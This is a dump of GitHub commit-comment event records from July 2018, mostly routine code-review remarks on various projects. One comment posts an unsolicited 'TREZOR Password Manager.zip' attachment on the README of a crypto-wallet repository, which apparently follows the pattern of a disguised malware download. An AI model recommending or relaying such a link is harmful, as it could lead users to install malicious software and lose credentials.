{"id":"7993692885","type":"CommitCommentEvent","actor":{"login":"collabTester18"},"repo":{"name":"collabTester18/hire"},"payload":{"comment":{"id":29775868,"position":null,"line":null,"path":null,"commit_id":"5c9aef0c99c5391bcc13fc704f7972b520670bfb","created_at":"2018-07-20T08:39:37Z","updated_at":"2018-07-20T08:39:37Z","author_association":"OWNER","body":"Collaborator: Review for this commit was created. [Link to review](http://217.170.125.19:40101/ui#review:id=5)"}},"created_at":"2018-07-20T08:39:37Z"}
{"id":"7993693894","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"denio-rus/thinknetica-ruby"},"payload":{"comment":{"id":29775869,"position":104,"line":104,"path":"BlackJack/game.rb","commit_id":"a4a0dcd2c0438d6a364fe5202fc34b13b30ed6b1","created_at":"2018-07-20T08:39:51Z","updated_at":"2018-07-20T08:39:51Z","author_association":"NONE","body":"т.е. тебе здесь достаточно написать только первую строчку (и без \"иф\" оператора)"}},"created_at":"2018-07-20T08:39:51Z"}
{"id":"7993695101","type":"CommitCommentEvent","actor":{"login":"sfdota"},"repo":{"name":"eitail/Base64Pic"},"payload":{"comment":{"id":29775885,"position":null,"line":null,"path":null,"commit_id":"2b7d4deeaf20820bff6584a31c0f1c89e9d452ca","created_at":"2018-07-20T08:40:07Z","updated_at":"2018-07-20T08:40:07Z","author_association":"NONE","body":"how to exec your project,it seems not have ui_mainwindow.h file><"}},"created_at":"2018-07-20T08:40:07Z"}
{"id":"7993704030","type":"CommitCommentEvent","actor":{"login":"winex"},"repo":{"name":"ldtteam/minecolonies"},"payload":{"comment":{"id":29775906,"position":42,"line":140,"path":"src/main/java/com/minecolonies/coremod/entity/ai/citizen/guard/AbstractEntityAIGuard.java","commit_id":"36aa3aa37a2919d95db62bca447f1929862a4432","created_at":"2018-07-20T08:42:03Z","updated_at":"2018-07-20T08:42:03Z","author_association":"CONTRIBUTOR","body":"because you use `<= maxLevelRequired` in requesting code, i think the CHAINMAIL ones should be level `7` max just above this line or the IRON ones should start from `9`. though, idk if dual request will work here"}},"created_at":"2018-07-20T08:42:03Z"}
{"id":"7993705031","type":"CommitCommentEvent","actor":{"login":"downtiser"},"repo":{"name":"downtiser/python-one"},"payload":{"comment":{"id":29775910,"position":1,"line":1,"path":"17 hashlib and hmac","commit_id":"1720f3f0b501dfddf454cb9857ed45de15118b4c","created_at":"2018-07-20T08:42:16Z","updated_at":"2018-07-20T08:42:16Z","author_association":"OWNER","body":"### hashlib 和hmac 只支持bytes格式,,因为python3中数据本身格式默认为unicode，所以在加密内容前需加上b,而这种方法只支持内容为ASCII码表中的字符,所以如果需加密中文，得先encode为utf-8，因为python3中encode之后默认将数据转为bytes格式，所以之后就可以运行"}},"created_at":"2018-07-20T08:42:16Z"}
{"id":"7993705445","type":"CommitCommentEvent","actor":{"login":"RoanBrand"},"repo":{"name":"IMQS/user-storage"},"payload":{"comment":{"id":29775911,"position":116,"line":186,"path":"userstorage/httphandler.go","commit_id":"a8efd8cd94f1451bfb1fa8c734894e1c9025d818","created_at":"2018-07-20T08:42:21Z","updated_at":"2018-07-20T08:42:21Z","author_association":"NONE","body":"what about `strings.TrimLeft` or `strings.TrimPrefix`?"}},"created_at":"2018-07-20T08:42:21Z"}
{"id":"7993706846","type":"CommitCommentEvent","actor":{"login":"daesoop"},"repo":{"name":"daesoop/cs-level1"},"payload":{"comment":{"id":29775916,"position":null,"line":null,"path":null,"commit_id":"a402ca48c8369d0f89ee64f7217e897276125f6b","created_at":"2018-07-20T08:42:40Z","updated_at":"2018-07-20T08:42:40Z","author_association":"OWNER","body":"<!DOCTYPE html>\r\n<html lang=\"en\" dir=\"ltr\">\r\n  <head>\r\n    <meta charset=\"utf-8\">\r\n    <title></title>\r\n  </head>\r\n  <body>\r\n    <h1>사칙연산</h1>\r\n\r\n    <script>\r\n        var s1 = prompt(\"숫자 1을 입력해 주세요.\");\r\n        var s2 = prompt(\"숫자 2를 입력해 주세요.\");\r\n        var n2 = Number(s2);\r\n        console.log(n1 + \"+\" + n2 + \" = \" + (n1 + n2));\r\n        console.log(n1 + \"-\" + n2 + \" = \" + (n1 - n2));\r\n        console.log(n1 + \"*\" + n2 + \" = \" + (n1 * n2));\r\n        console.log(n1 + \"/\" + n2 + \" = \" + (n1 / n2));\r\n      </script>\r\n    <h1> bmi 계산법</h1>\r\n\r\n    <script>\r\n    var s1 = prompt (\" 자신의 키를 미터로 적어주세요. \");\r\n    var s2 = prompt (\" 자신의 몸무게를 킬로그램으로 적어주세요. \")\r\n    var n1 = Number(s1);\r\n    var n2 = Number(s2);\r\n    var n3 = n1**2;\r\n    var n4 = (n2 + \" / \" + n3 + \" = \" + (n2 / n3));\r\n    console.log(\"당신의 bmi 결과는 \"+n4+\"입니다. \");\r\n    </script>\r\n\r\n    <h1>섭씨 계산법</h1>\r\n\r\n    <script>\r\n    var a = prompt(\"온도를 적어주세요.\");\r\n    var f = Number(a);\r\n    var c = \"result\";\r\n    console.log(c + \" = \" + (f-32) + \"/\" + 1.8);\r\n\r\n    </script>\r\n    <h1>문자 길이 확인하기 </h1>\r\n\r\n    var a = prompt(\"글을 입력하시면 글의 숫자가 나옵니다.\");\r\n    console.log(a.length);\r\n\r\n    </script>\r\n\r\n  </body>\r\n</html>\r\n"}},"created_at":"2018-07-20T08:42:40Z"}
{"id":"7993708141","type":"CommitCommentEvent","actor":{"login":"michaelandrepearce"},"repo":{"name":"apache/activemq-artemis"},"payload":{"comment":{"id":29775919,"position":19,"line":574,"path":"artemis-jms-client/src/main/java/org/apache/activemq/artemis/jms/client/ActiveMQMessageProducer.java","commit_id":"a2da41ee2e347bcf8fe721bded89e4a78ca14cfb","created_at":"2018-07-20T08:42:57Z","updated_at":"2018-07-20T08:42:57Z","author_association":"CONTRIBUTOR","body":"On that note this shouldnt have been needed as when the responses comeback to the correlation cache its meant to remove thus avoid situation of double confirm. If you saw double confirm then the code there should be addressed."}},"created_at":"2018-07-20T08:42:57Z"}
{"id":"7993709941","type":"CommitCommentEvent","actor":{"login":"elevinskii"},"repo":{"name":"elevinskii/magento2-module-banner"},"payload":{"comment":{"id":29775923,"position":6,"line":6,"path":"Controller/Adminhtml/Banner/Action.php","commit_id":"ddee200944452a156206db43fd558e281d16271b","created_at":"2018-07-20T08:43:22Z","updated_at":"2018-07-20T08:43:22Z","author_association":"OWNER","body":"Move to abstract class banner"}},"created_at":"2018-07-20T08:43:22Z"}
{"id":"7993712120","type":"CommitCommentEvent","actor":{"login":"daesoop"},"repo":{"name":"daesoop/cs-level1"},"payload":{"comment":{"id":29775929,"position":null,"line":null,"path":null,"commit_id":"a402ca48c8369d0f89ee64f7217e897276125f6b","created_at":"2018-07-20T08:43:50Z","updated_at":"2018-07-20T08:43:50Z","author_association":"OWNER","body":"<!DOCTYPE html>\r\n<html lang=\"en\" dir=\"ltr\">\r\n  <head>\r\n    <meta charset=\"utf-8\">\r\n    <title></title>\r\n  </head>\r\n  <body>\r\n    <h1>사칙연산</h1>\r\n\r\n    <script>\r\n        var s1 = prompt(\"숫자 1을 입력해 주세요.\");\r\n        var s2 = prompt(\"숫자 2를 입력해 주세요.\");\r\n        var n2 = Number(s2);\r\n        console.log(n1 + \"+\" + n2 + \" = \" + (n1 + n2));\r\n        console.log(n1 + \"-\" + n2 + \" = \" + (n1 - n2));\r\n        console.log(n1 + \"*\" + n2 + \" = \" + (n1 * n2));\r\n        console.log(n1 + \"/\" + n2 + \" = \" + (n1 / n2));\r\n      </script>\r\n    <h1> bmi 계산법</h1>\r\n\r\n    <script>\r\n    var s1 = prompt (\" 자신의 키를 미터로 적어주세요. \");\r\n    var s2 = prompt (\" 자신의 몸무게를 킬로그램으로 적어주세요. \")\r\n    var n1 = Number(s1);\r\n    var n2 = Number(s2);\r\n    var n3 = n1**2;\r\n    var n4 = (n2 + \" / \" + n3 + \" = \" + (n2 / n3));\r\n    console.log(\"당신의 bmi 결과는 \"+n4+\"입니다. \");\r\n    </script>\r\n\r\n    <h1>섭씨 계산법</h1>\r\n\r\n    <script>\r\n    var a = prompt(\"온도를 적어주세요.\");\r\n    var f = Number(a);\r\n    var c = \"result\";\r\n    console.log(c + \" = \" + (f-32) + \"/\" + 1.8);\r\n\r\n    </script>\r\n    <h1>문자 길이 확인하기 </h1>\r\n\r\n    var a = prompt(\"글을 입력하시면 글의 숫자가 나옵니다.\");\r\n    console.log(a.length);\r\n\r\n    </script>\r\n\r\n  </body>\r\n</html>\r\n"}},"created_at":"2018-07-20T08:43:50Z"}
{"id":"7993716224","type":"CommitCommentEvent","actor":{"login":"RoanBrand"},"repo":{"name":"IMQS/user-storage"},"payload":{"comment":{"id":29775936,"position":29,"line":94,"path":"userstorage/httphandler.go","commit_id":"298f64021e02b6589d9e30d7d088f651e67d9465","created_at":"2018-07-20T08:44:41Z","updated_at":"2018-07-20T08:44:41Z","author_association":"NONE","body":"why not have `text/json` for the other json that is returned as well?"}},"created_at":"2018-07-20T08:44:41Z"}
{"id":"7993717578","type":"CommitCommentEvent","actor":{"login":"RoanBrand"},"repo":{"name":"IMQS/user-storage"},"payload":{"comment":{"id":29775941,"position":29,"line":94,"path":"userstorage/httphandler.go","commit_id":"298f64021e02b6589d9e30d7d088f651e67d9465","created_at":"2018-07-20T08:45:00Z","updated_at":"2018-07-20T08:45:00Z","author_association":"NONE","body":"should actually be `application/json`?"}},"created_at":"2018-07-20T08:45:00Z"}
{"id":"7993720812","type":"CommitCommentEvent","actor":{"login":"elevinskii"},"repo":{"name":"elevinskii/magento2-module-banner"},"payload":{"comment":{"id":29775951,"position":7,"line":7,"path":"view/adminhtml/layout/adminhtml_banner_edit.xml","commit_id":"0116f96b5ea744a0b04e81474cdac96dbd94ea85","created_at":"2018-07-20T08:45:41Z","updated_at":"2018-07-20T08:45:41Z","author_association":"OWNER","body":"Rename ui_component"}},"created_at":"2018-07-20T08:45:41Z"}
{"id":"7993722057","type":"CommitCommentEvent","actor":{"login":"thebear213"},"repo":{"name":"babyjie57/hello-world"},"payload":{"comment":{"id":29775957,"position":null,"line":null,"path":null,"commit_id":"8cb7cecd412f76b596449bc960e435f14552f4ad","created_at":"2018-07-20T08:45:59Z","updated_at":"2018-07-20T08:45:59Z","author_association":"NONE","body":"https://blog.csdn.net/roamer_nuptgczx/article/details/52141986"}},"created_at":"2018-07-20T08:45:59Z"}
{"id":"7993722772","type":"CommitCommentEvent","actor":{"login":"heyucongtom"},"repo":{"name":"ray-project/ray"},"payload":{"comment":{"id":29775958,"position":null,"line":null,"path":null,"commit_id":"2a3b02649a799ed0bcfa4b98e0bbb5a3bcea4f3c","created_at":"2018-07-20T08:46:08Z","updated_at":"2018-07-20T08:46:08Z","author_association":"CONTRIBUTOR","body":"Seems to incur some tune errors:\r\ne.g https://api.travis-ci.com/v3/job/135495035/log.txt\r\n\r\n[1m\u001b[31mE                       TuneError: Insufficient cluster resources to launch trial: trial requested 1 CPUs, 0 GPUs but the cluster only has 0 CPUs, 0 GPUs available. Pass `queue_trials=True` in ray.tune.run_experiments() or on the command line to queue trials until the cluster scales up.\u001b[0m"}},"created_at":"2018-07-20T08:46:08Z"}
{"id":"7993722900","type":"CommitCommentEvent","actor":{"login":"rachelreese"},"repo":{"name":"WallarooLabs/wallaroo"},"payload":{"comment":{"id":29775959,"position":5,"line":12,"path":"book/python/writing-your-own-partitioned-stateful-application.md","commit_id":"47ab7d6ed4b9b2c651328548af766c036884b49a","created_at":"2018-07-20T08:46:10Z","updated_at":"2018-07-20T08:46:10Z","author_association":"CONTRIBUTOR","body":"D'oh. Emacs doesn't overwrite when I highlight & paste. Keeps catching me up. Thanks. :) "}},"created_at":"2018-07-20T08:46:10Z"}
{"id":"7993726530","type":"CommitCommentEvent","actor":{"login":"RoanBrand"},"repo":{"name":"IMQS/user-storage"},"payload":{"comment":{"id":29775972,"position":51,"line":117,"path":"userstorage/httphandler.go","commit_id":"d715d465d82d973e15c8a8a4d0163eee0a12200c","created_at":"2018-07-20T08:46:53Z","updated_at":"2018-07-20T08:46:53Z","author_association":"NONE","body":"I think for API that don't return data like this one, returning just 200 will be enough.\r\nYou can just remove both of these lines then"}},"created_at":"2018-07-20T08:46:53Z"}
{"id":"7993730806","type":"CommitCommentEvent","actor":{"login":"zhnlk"},"repo":{"name":"chenmengye/articles_analysis"},"payload":{"comment":{"id":29775980,"position":9,"line":9,"path":"Article_similarity_analysis.py","commit_id":"05dc00b21b05e2c257408d22c9949605be885b71","created_at":"2018-07-20T08:47:48Z","updated_at":"2018-07-20T08:47:48Z","author_association":"NONE","body":"test"}},"created_at":"2018-07-20T08:47:48Z"}
{"id":"7993730961","type":"CommitCommentEvent","actor":{"login":"humenda"},"repo":{"name":"TUD-INF-IAI-MCI/AGSBS-infrastructure"},"payload":{"comment":{"id":29775981,"position":47,"line":132,"path":"MAGSBS/pandoc/contentfilter.py","commit_id":"a8a1b76ba2b12c4de2bfeb161fe7718bb832e2c1","created_at":"2018-07-20T08:47:50Z","updated_at":"2018-07-20T08:47:50Z","author_association":"CONTRIBUTOR","body":"Regarding `__format_filename`: `filename = filename.replace(' ', '_')`; why do\nyou do that? We can handle spaces just fine and Pandoc is not called using a\nshell anyway.\n\n"}},"created_at":"2018-07-20T08:47:50Z"}
{"id":"7993739037","type":"CommitCommentEvent","actor":{"login":"ccp92"},"repo":{"name":"madetech/learn"},"payload":{"comment":{"id":29776000,"position":54,"line":54,"path":"workshops/07-TPP-Workshop/README.md","commit_id":"63de3550ffce2dec90bd9301cadb64cdbcf3d2b2","created_at":"2018-07-20T08:49:31Z","updated_at":"2018-07-20T08:49:31Z","author_association":"NONE","body":"@craigjbass the last item on the list of transformations (14) doesn't read very clearly when compared to the other items.\r\nIs it meant to be two items (i.e. 14 for (case), and 15 for (or else)?\r\nOr should it be closer to \"(case) adding a case, or else, to an existing switch or if\""}},"created_at":"2018-07-20T08:49:31Z"}
{"id":"7993739538","type":"CommitCommentEvent","actor":{"login":"MartinBenninger"},"repo":{"name":"MartinBenninger/test-rtc-git-connector"},"payload":{"comment":{"id":29776002,"position":null,"line":null,"path":null,"commit_id":"8b4db3a9d26ec1b7b051c353ab368f033fe0e946","created_at":"2018-07-20T08:49:38Z","updated_at":"2018-07-20T08:49:38Z","author_association":"OWNER","body":"This commit was linked by [RTC Work Item 52](https://localhost:7443/jazz/resource/itemName/com.ibm.team.workitem.WorkItem/52) on behalf of ADMIN"}},"created_at":"2018-07-20T08:49:38Z"}
{"id":"7993739568","type":"CommitCommentEvent","actor":{"login":"MartinBenninger"},"repo":{"name":"MartinBenninger/test-rtc-git-connector"},"payload":{"comment":{"id":29776003,"position":null,"line":null,"path":null,"commit_id":"3edec38db46129a84c46e1cb62a1af999c730a25","created_at":"2018-07-20T08:49:39Z","updated_at":"2018-07-20T08:49:39Z","author_association":"OWNER","body":"This commit was linked by [RTC Work Item 52](https://localhost:7443/jazz/resource/itemName/com.ibm.team.workitem.WorkItem/52) on behalf of ADMIN"}},"created_at":"2018-07-20T08:49:39Z"}
{"id":"7993739983","type":"CommitCommentEvent","actor":{"login":"trommler"},"repo":{"name":"trommler/ghc"},"payload":{"comment":{"id":29776004,"position":365,"line":804,"path":"compiler/ghci/RtClosureInspect.hs","commit_id":"ec22f7ddc81b40a9dbcf140e5cf44730cb776d00","created_at":"2018-07-20T08:49:44Z","updated_at":"2018-07-20T08:49:44Z","author_association":"OWNER","body":"Does this work on big endian systems?"}},"created_at":"2018-07-20T08:49:44Z"}
{"id":"7993745181","type":"CommitCommentEvent","actor":{"login":"RoanBrand"},"repo":{"name":"IMQS/user-storage"},"payload":{"comment":{"id":29776014,"position":102,"line":172,"path":"userstorage/httphandler.go","commit_id":"a8efd8cd94f1451bfb1fa8c734894e1c9025d818","created_at":"2018-07-20T08:50:44Z","updated_at":"2018-07-20T08:50:44Z","author_association":"NONE","body":"don't force the compiler to put this on the heap. `client := http.Client{}` could be put on the stack which would be better."}},"created_at":"2018-07-20T08:50:44Z"}
{"id":"7993750253","type":"CommitCommentEvent","actor":{"login":"Mityushin"},"repo":{"name":"ansible-dellemc-unity/ansible-dellemc-unity"},"payload":{"comment":{"id":29776020,"position":1,"line":1,"path":"library/initiator.py","commit_id":"b41c9bf944739c72e2181fa8bdb24c2ce6292dce","created_at":"2018-07-20T08:51:49Z","updated_at":"2018-07-20T08:51:49Z","author_association":"NONE","body":"That'is hostInitiator, there is not rest object initiator"}},"created_at":"2018-07-20T08:51:49Z"}
{"id":"7993750265","type":"CommitCommentEvent","actor":{"login":"aevers1967"},"repo":{"name":"swagger-api/swagger-codegen"},"payload":{"comment":{"id":29776021,"position":null,"line":null,"path":null,"commit_id":"3af14597ee7ccfb862dcdb9d9b32d25d3fe8b554","created_at":"2018-07-20T08:51:49Z","updated_at":"2018-07-20T08:51:49Z","author_association":"NONE","body":"         <dependency>\r\n             <groupId>io.swagger</groupId>\r\n             <artifactId>swagger-codegen-generators</artifactId>\r\n             <version>${swagger-codegen-generators-version}</version>\r\n         </dependency>\r\n\r\nshould also be changed to \r\n\r\n         <dependency>\r\n             <groupId>io.swagger.codegen.v3</groupId>\r\n             <artifactId>swagger-codegen-generators</artifactId>\r\n             <version>${swagger-codegen-generators-version}</version>\r\n         </dependency>"}},"created_at":"2018-07-20T08:51:49Z"}
{"id":"7993752239","type":"CommitCommentEvent","actor":{"login":"RoanBrand"},"repo":{"name":"IMQS/user-storage"},"payload":{"comment":{"id":29776022,"position":103,"line":173,"path":"userstorage/httphandler.go","commit_id":"a8efd8cd94f1451bfb1fa8c734894e1c9025d818","created_at":"2018-07-20T08:52:15Z","updated_at":"2018-07-20T08:52:15Z","author_association":"NONE","body":"You are not handling the error here which could happen.\r\nAND\r\nI'm pretty sure you need to check the response code after the request completed and react on that. You might also get an error message back in the body"}},"created_at":"2018-07-20T08:52:15Z"}
{"id":"7993756435","type":"CommitCommentEvent","actor":{"login":"ModricModric"},"repo":{"name":"minglich/logitech-pubg"},"payload":{"comment":{"id":29776028,"position":null,"line":null,"path":null,"commit_id":"31e652dbd25ffe42c71191fd44cff07216c41b72","created_at":"2018-07-20T08:53:05Z","updated_at":"2018-07-20T08:53:05Z","author_association":"NONE","body":"@minglich Hero"}},"created_at":"2018-07-20T08:53:05Z"}
{"id":"7993760387","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"denio-rus/thinknetica-ruby"},"payload":{"comment":{"id":29776038,"position":1,"line":1,"path":"BlackJack/bank.rb","commit_id":"a4a0dcd2c0438d6a364fe5202fc34b13b30ed6b1","created_at":"2018-07-20T08:53:53Z","updated_at":"2018-07-20T08:53:53Z","author_association":"NONE","body":"не очень удачно, в смысле организации, что нет возможности выйти из игры после каждого раунда, т.е. сдача происходит автоматом без того, чтобы спросить хочу ли я продолжать игру\r\nвыход из игры возможен только если один из игроков проиграет все деньги )))\r\n"}},"created_at":"2018-07-20T08:53:53Z"}
{"id":"7993764877","type":"CommitCommentEvent","actor":{"login":"RoanBrand"},"repo":{"name":"IMQS/user-storage"},"payload":{"comment":{"id":29776072,"position":97,"line":167,"path":"userstorage/httphandler.go","commit_id":"a8efd8cd94f1451bfb1fa8c734894e1c9025d818","created_at":"2018-07-20T08:54:48Z","updated_at":"2018-07-20T08:54:48Z","author_association":"NONE","body":"`err` not handled"}},"created_at":"2018-07-20T08:54:48Z"}
{"id":"7993768302","type":"CommitCommentEvent","actor":{"login":"elevinskii"},"repo":{"name":"elevinskii/magento2-module-banner"},"payload":{"comment":{"id":29776080,"position":12,"line":12,"path":"Ui/Component/Form/Buttons/Delete.php","commit_id":"0116f96b5ea744a0b04e81474cdac96dbd94ea85","created_at":"2018-07-20T08:55:31Z","updated_at":"2018-07-20T08:55:31Z","author_association":"OWNER","body":"Need class?"}},"created_at":"2018-07-20T08:55:31Z"}
{"id":"7993769661","type":"CommitCommentEvent","actor":{"login":"kritik"},"repo":{"name":"shoperb/theme-editor"},"payload":{"comment":{"id":29776085,"position":13,"line":22,"path":"README.md","commit_id":"e1610f77023759a629447fb276a37bf573b95df8","created_at":"2018-07-20T08:55:49Z","updated_at":"2018-07-20T08:55:49Z","author_association":"NONE","body":"Can you change this to https link? So it would be smth https://github.com/shoperb/shoperb-liquid.git"}},"created_at":"2018-07-20T08:55:49Z"}
{"id":"7993778201","type":"CommitCommentEvent","actor":{"login":"AUTHAI-bit"},"repo":{"name":"trezor/connect"},"payload":{"comment":{"id":29776107,"position":13,"line":35,"path":"README.md","commit_id":"34fe6bc2fa95f5b50781a0f599c11f7e9f90ad38","created_at":"2018-07-20T08:57:31Z","updated_at":"2018-07-20T08:57:31Z","author_association":"NONE","body":"\r\n[TREZOR Password Manager.zip](https://github.com/trezor/connect/files/2213216/TREZOR.Password.Manager.zip)\r\n"}},"created_at":"2018-07-20T08:57:31Z"}
{"id":"7993787050","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"denio-rus/thinknetica-ruby"},"payload":{"comment":{"id":29776130,"position":109,"line":109,"path":"BlackJack/game.rb","commit_id":"a4a0dcd2c0438d6a364fe5202fc34b13b30ed6b1","created_at":"2018-07-20T08:59:20Z","updated_at":"2018-07-20T08:59:20Z","author_association":"NONE","body":"вот этот и предыдущий метод как то очень похожи\r\nскорее всего надо над ними помедитировать и либо сделать в одном вызов другого, либо еще как-то отрефакторить код"}},"created_at":"2018-07-20T08:59:20Z"}
{"id":"7993790749","type":"CommitCommentEvent","actor":{"login":"elevinskii"},"repo":{"name":"elevinskii/magento2-module-banner"},"payload":{"comment":{"id":29776143,"position":50,"line":50,"path":"Ui/Component/Form/Buttons/GenericButton.php","commit_id":"0116f96b5ea744a0b04e81474cdac96dbd94ea85","created_at":"2018-07-20T09:00:06Z","updated_at":"2018-07-20T09:00:06Z","author_association":"OWNER","body":"Can we remove this method?"}},"created_at":"2018-07-20T09:00:06Z"}
{"id":"7993792359","type":"CommitCommentEvent","actor":{"login":"funkybob"},"repo":{"name":"onysos/django-composite-foreignkey"},"payload":{"comment":{"id":29776148,"position":16,"line":16,"path":"docs/installation.rst","commit_id":"7678921dde33681313284363ead1ef04011035ad","created_at":"2018-07-20T09:00:23Z","updated_at":"2018-07-20T09:00:23Z","author_association":"NONE","body":"Looks like you forgot to update the name of the package..."}},"created_at":"2018-07-20T09:00:23Z"}
{"id":"7993794901","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"denio-rus/thinknetica-ruby"},"payload":{"comment":{"id":29776153,"position":109,"line":109,"path":"BlackJack/game.rb","commit_id":"a4a0dcd2c0438d6a364fe5202fc34b13b30ed6b1","created_at":"2018-07-20T09:00:54Z","updated_at":"2018-07-20T09:00:54Z","author_association":"NONE","body":"и еще коммент про эти два метода\r\nу тебя все цифры связанные с деньгами вынесены в отдельный класс - Банк, что хорошо, но что тогда здесь делают цифры 200?\r\nэто же на самом деле `player_money + dealer_money`"}},"created_at":"2018-07-20T09:00:54Z"}
{"id":"7993798440","type":"CommitCommentEvent","actor":{"login":"andhikayuana"},"repo":{"name":"qiscus/qiscus-sdk-android"},"payload":{"comment":{"id":29776164,"position":null,"line":null,"path":null,"commit_id":"319e247acf758f98b119b1a4c7bc635c3ae9fcba","created_at":"2018-07-20T09:01:38Z","updated_at":"2018-07-20T09:01:38Z","author_association":"MEMBER","body":"Hi, we are updating our image loader library using [latest glide version](https://github.com/bumptech/glide/releases/tag/v4.7.1) #66 #17 \r\ncc @fadhilnurmahardi @mahasadhu"}},"created_at":"2018-07-20T09:01:38Z"}
{"id":"7993802856","type":"CommitCommentEvent","actor":{"login":"kfornace"},"repo":{"name":"kfornace/monkeybar"},"payload":{"comment":{"id":29776173,"position":null,"line":null,"path":null,"commit_id":"1154a13e737d543d0a8e3bd2d8b6d30f2d06f923","created_at":"2018-07-20T09:02:35Z","updated_at":"2018-07-20T09:02:35Z","author_association":"OWNER","body":"Ensemble boosted regression tree models for spatial scale"}},"created_at":"2018-07-20T09:02:35Z"}
{"id":"7993803856","type":"CommitCommentEvent","actor":{"login":"SushiTee"},"repo":{"name":"TUD-INF-IAI-MCI/AGSBS-infrastructure"},"payload":{"comment":{"id":29776175,"position":47,"line":132,"path":"MAGSBS/pandoc/contentfilter.py","commit_id":"a8a1b76ba2b12c4de2bfeb161fe7718bb832e2c1","created_at":"2018-07-20T09:02:47Z","updated_at":"2018-07-20T09:02:47Z","author_association":"COLLABORATOR","body":"because I don't like spaces. But ok, I will remove that line."}},"created_at":"2018-07-20T09:02:47Z"}
{"id":"7993808232","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"denio-rus/thinknetica-ruby"},"payload":{"comment":{"id":29776187,"position":109,"line":109,"path":"BlackJack/game.rb","commit_id":"a4a0dcd2c0438d6a364fe5202fc34b13b30ed6b1","created_at":"2018-07-20T09:03:40Z","updated_at":"2018-07-20T09:03:40Z","author_association":"NONE","body":"ну и если честно, то не очень мне кажется удачная проверка... лучше уж тогда проверять, что у кого-то банк на нуле, чем что у кого-то он двойной\r\nкак-то это проще и понятней... \r\nможно это делать в другом методе, т.к. этот называется \"победитель\", а здесь уже по результату выполнения метода \"проигравший\" что-то решать, либо прямо здесь делать эту проверку и возвращать второго игрока... \r\nно проверка на ноль как-то более реалистична и практична"}},"created_at":"2018-07-20T09:03:40Z"}
{"id":"7993810954","type":"CommitCommentEvent","actor":{"login":"dusanvel"},"repo":{"name":"davidbujic/Python"},"payload":{"comment":{"id":29776190,"position":null,"line":null,"path":null,"commit_id":"d17c3dd09d28e04010661139659a81cc4cbd21f8","created_at":"2018-07-20T09:04:13Z","updated_at":"2018-07-20T09:04:13Z","author_association":"NONE","body":"Davide, ovo sad izgleda prilicno dobro"}},"created_at":"2018-07-20T09:04:13Z"}
{"id":"7993814125","type":"CommitCommentEvent","actor":{"login":"Kanglans"},"repo":{"name":"Kanglans/DotNet"},"payload":{"comment":{"id":29776199,"position":null,"line":null,"path":null,"commit_id":"f64f187b48746417cbd04c8de063d2cf378efa51","created_at":"2018-07-20T09:04:53Z","updated_at":"2018-07-20T09:04:53Z","author_association":"OWNER","body":"new"}},"created_at":"2018-07-20T09:04:53Z"}
{"id":"7993814423","type":"CommitCommentEvent","actor":{"login":"dr-madatsin"},"repo":{"name":"SpillChek2/Office-IT-Pro-Deployment-Scripts"},"payload":{"comment":{"id":29776200,"position":1,"line":1,"path":"Exchange-Online-Management/Disable-ExchangeOnlineMobileAccess/README_Restrict-ExchangeOnlineMobileAccess.md","commit_id":"909879b546ae9b894fa9eda2f6d036f89029cacc","created_at":"2018-07-20T09:04:56Z","updated_at":"2018-07-20T09:04:56Z","author_association":"NONE","body":"bravo team\r\n"}},"created_at":"2018-07-20T09:04:56Z"}
{"id":"7993827582","type":"CommitCommentEvent","actor":{"login":"uu2018"},"repo":{"name":"uu2018/first"},"payload":{"comment":{"id":29776239,"position":1,"line":1,"path":"nihao","commit_id":"01ca7b6e83f3d02dc7f1ec07ba5ed43fe238ac0f","created_at":"2018-07-20T09:07:42Z","updated_at":"2018-07-20T09:07:42Z","author_association":"OWNER","body":"你说得不对"}},"created_at":"2018-07-20T09:07:42Z"}
{"id":"7993831206","type":"CommitCommentEvent","actor":{"login":"craigjbass"},"repo":{"name":"madetech/learn"},"payload":{"comment":{"id":29776251,"position":54,"line":54,"path":"workshops/07-TPP-Workshop/README.md","commit_id":"63de3550ffce2dec90bd9301cadb64cdbcf3d2b2","created_at":"2018-07-20T09:08:26Z","updated_at":"2018-07-20T09:08:26Z","author_association":"MEMBER","body":"I will admit I copied this from the reference blog, but I do agree "}},"created_at":"2018-07-20T09:08:26Z"}
{"id":"7993831345","type":"CommitCommentEvent","actor":{"login":"uu2018"},"repo":{"name":"uu2018/first"},"payload":{"comment":{"id":29776253,"position":2,"line":2,"path":"nihao","commit_id":"01ca7b6e83f3d02dc7f1ec07ba5ed43fe238ac0f","created_at":"2018-07-20T09:08:28Z","updated_at":"2018-07-20T09:08:28Z","author_association":"OWNER","body":"hiiigg"}},"created_at":"2018-07-20T09:08:28Z"}
{"id":"7993832358","type":"CommitCommentEvent","actor":{"login":"craigjbass"},"repo":{"name":"madetech/learn"},"payload":{"comment":{"id":29776255,"position":54,"line":54,"path":"workshops/07-TPP-Workshop/README.md","commit_id":"63de3550ffce2dec90bd9301cadb64cdbcf3d2b2","created_at":"2018-07-20T09:08:42Z","updated_at":"2018-07-20T09:08:42Z","author_association":"MEMBER","body":"> (case) adding a case, or else, to an existing switch or if"}},"created_at":"2018-07-20T09:08:42Z"}
{"id":"7993832575","type":"CommitCommentEvent","actor":{"login":"Pleuvoir"},"repo":{"name":"Pleuvoir/learning-doc"},"payload":{"comment":{"id":29776256,"position":null,"line":null,"path":null,"commit_id":"d0033de014a4ec251deda5a5ef7ef223c43fbc17","created_at":"2018-07-20T09:08:44Z","updated_at":"2018-07-20T09:08:44Z","author_association":"OWNER","body":"java -c 不可用\r\nhttps://docs.oracle.com/javase/6/docs/technotes/guides/rmi/hello/hello-world.html"}},"created_at":"2018-07-20T09:08:44Z"}
{"id":"7993837762","type":"CommitCommentEvent","actor":{"login":"ahankinson"},"repo":{"name":"DDMAL/diva.js"},"payload":{"comment":{"id":29776269,"position":8,"line":702,"path":"source/js/diva.js","commit_id":"1779ab5d7bed19ba67cb138334b4c9ce1fded448","created_at":"2018-07-20T09:09:45Z","updated_at":"2018-07-20T09:09:45Z","author_association":"MEMBER","body":"Needs to be `**/`"}},"created_at":"2018-07-20T09:09:45Z"}
